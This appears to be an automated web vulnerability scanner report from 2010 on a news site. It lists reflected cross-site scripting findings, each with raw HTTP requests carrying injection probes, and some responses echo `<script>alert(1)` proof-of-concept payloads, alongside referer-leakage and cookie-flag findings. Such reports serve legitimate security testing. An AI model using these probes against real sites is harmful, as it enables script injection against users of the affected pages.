1. Cross-site scripting (reflected)
1.1. http://www.thestar.com//mostpopular [REST URL parameter 1]
1.2. http://www.thestar.com//mostpopular [WMP_Type parameter]
1.3. http://www.thestar.com/ScriptResource.axd [REST URL parameter 1]
1.4. http://www.thestar.com/Toplets/Polling/caching/PollRequest [PollNavigation parameter]
1.5. http://www.thestar.com/Toplets/Polling/caching/PollRequest [REST URL parameter 1]
1.6. http://www.thestar.com/Toplets/Polling/caching/PollRequest [REST URL parameter 2]
1.7. http://www.thestar.com/Toplets/Polling/caching/PollRequest [REST URL parameter 3]
1.8. http://www.thestar.com/WebResource.axd [REST URL parameter 1]
1.9. http://www.thestar.com/favicon.ico [REST URL parameter 1]
1.10. http://www.thestar.com/includes/columnist [REST URL parameter 1]
1.11. http://www.thestar.com/includes/columnist [REST URL parameter 2]
1.12. http://www.thestar.com/includes/headerweather [REST URL parameter 1]
1.13. http://www.thestar.com/includes/headerweather [REST URL parameter 2]
1.14. http://www.thestar.com/includes/stockmarket [REST URL parameter 1]
1.15. http://www.thestar.com/includes/stockmarket [REST URL parameter 2]
1.16. http://www.thestar.com/includes/thebreak [REST URL parameter 1]
1.17. http://www.thestar.com/includes/thebreak [REST URL parameter 2]
1.18. http://www.thestar.com/mostpopular [MP_Home parameter]
1.19. http://www.thestar.com/mostpopular [REST URL parameter 1]
1.20. http://www.thestar.com/mostpopular [WMP_Type parameter]
1.21. http://www.thestar.com/searchresults [REST URL parameter 1]
1.22. http://www.thestar.com/searchresults [q parameter]
1.23. http://www.thestar.com/searchresults [q parameter]
1.24. http://www.thestar.com/xd_receiver.htm [REST URL parameter 1]
2. Cross-domain Referer leakage
2.1. http://www.thestar.com//mostpopular
2.2. http://www.thestar.com/Toplets/Polling/caching/PollRequest
2.3. http://www.thestar.com/includes/headerweather
2.4. http://www.thestar.com/mostpopular
2.5. http://www.thestar.com/searchresults
2.6. http://www.thestar.com/searchresults
3. Cross-domain script include
3.2. http://www.thestar.com//mostpopular
3.3. http://www.thestar.com/mostpopular
3.4. http://www.thestar.com/searchresults
3.5. http://www.thestar.com/xd_receiver.htm
4. Cookie without HttpOnly flag set
5.2. http://www.thestar.com/searchresults
6. HTML does not specify charset
7. Content type incorrectly stated
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | //mostpopular |
GET //mostpopular151a0'%3b41495d20265?category=&WMP_Apply Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:30:11 GMT X-Varnish: 2024539101 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 53182 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | //mostpopular |
GET //mostpopular?category= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:29:25 GMT X-Varnish: 2024535878 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 9652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> M ...[SNIP]... </script>HOYT LLC PoC913f5<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /ScriptResource.axd |
GET /297ef'%3bf80f9b291c1?d=Hqvm3mzRTuNOMXZRR Accept: */* Referer: http://www.thestar.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:27 GMT X-Varnish: 2024489153 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52842 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /Toplets/Polling/caching |
GET /Toplets/Polling/caching x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:53 GMT X-Varnish: 2024491091 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 3283 <div class="ts-module_header <span class="ts-shadow </div> <div class="ts-mo ...[SNIP]... <a href="javascript:PostPoll class=""> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /Toplets/Polling/caching |
GET /Topletsd3e23'%3be1c8d73ea50/Polling/caching x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:20:59 GMT X-Varnish: 2024496284 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 53996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /Toplets/Polling/caching |
GET /Toplets/Polling71bed'%3b70e3a79f874/caching/PollRequest x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:21:36 GMT X-Varnish: 2024499299 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 53834 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /Toplets/Polling/caching |
GET /Toplets/Polling/caching6d62d'%3bcb92d2c9486/PollRequest?assetId x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:22:16 GMT X-Varnish: 2024502611 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 53312 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /WebResource.axd |
GET /1ece9'%3b9bee953c985?d=pF4WHrC6CQAEdIrip Accept: */* Referer: http://www.thestar.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:22 GMT X-Varnish: 2024488710 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52512 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /favicon.ico |
GET /53586'%3b10e8003cd88 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:29:20 GMT X-Varnish: 2024535303 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52052 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/columnist |
GET /includes950de'%3be3346b4910/columnist?Query x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:21:08 GMT X-Varnish: 2024497089 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52926 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/columnist |
GET /includes/columnist772f9'%3b35176592f2?Query=FullCategory%3A%22 x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:22:05 GMT X-Varnish: 2024501592 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52790 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/headerweather |
GET /includes2c407'%3bdcb55b58158/headerweather?Curre x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sat, 20 Nov 2010 05:21:28 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 cache-control: public, max-age = 120 X-TOPS-CacheReason: Weather Date: Sat, 20 Nov 2010 05:21:29 GMT X-Varnish: 2024498659 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 53068 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/headerweather |
GET /includes/headerweather4cfe7'%3b45a2a50f6e3?CurrentEdition=toronto HTTP/1.1 x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sat, 20 Nov 2010 05:22:11 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age = 120 X-TOPS-CacheReason: Weather Date: Sat, 20 Nov 2010 05:22:12 GMT X-Varnish: 2024502229 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52942 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/stockmarket |
GET /includeseb0ef'%3b66039811f75/stockmarket HTTP/1.1 x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:51 GMT X-Varnish: 2024490891 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52910 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/stockmarket |
GET /includes/stockmarketa9282'%3b67e59303d33 HTTP/1.1 x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:21:04 GMT X-Varnish: 2024496605 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52766 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/thebreak |
GET /includes7f6d9'%3b1ff7382e715/thebreak HTTP/1.1 x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:49 GMT X-Varnish: 2024490511 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52790 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /includes/thebreak |
GET /includes/thebreak10338'%3bddee43d21bb HTTP/1.1 x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://www.thestar.com/ Accept: text/html, */*; q=0.01 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:21:33 GMT X-Varnish: 2024498922 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /mostpopular |
GET /mostpopular?category= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.thestar.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:57 GMT X-Varnish: 2024491474 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 9162 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> M ...[SNIP]... <a href="/moneyville/blog ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /mostpopular |
GET /mostpopulara0169'%3b5abd38ea45a?category=&WMP_Apply Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.thestar.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:20:50 GMT X-Varnish: 2024495534 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52866 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /mostpopular |
GET /mostpopular?category= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.thestar.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.thestar.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:19:49 GMT X-Varnish: 2024490785 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 9115 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><title> M ...[SNIP]... <a href="/moneyville/blog ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.thestar.com |
Path: | /searchresults |
GET /searchresultsb36a8'%3bc8ce0c058a?AssetType=article&stype Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.thestar.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Sat, 20 Nov 2010 05:30:26 GMT X-Varnish: 2024540113 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 52876 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thestar.com |
Path: | /searchresults |
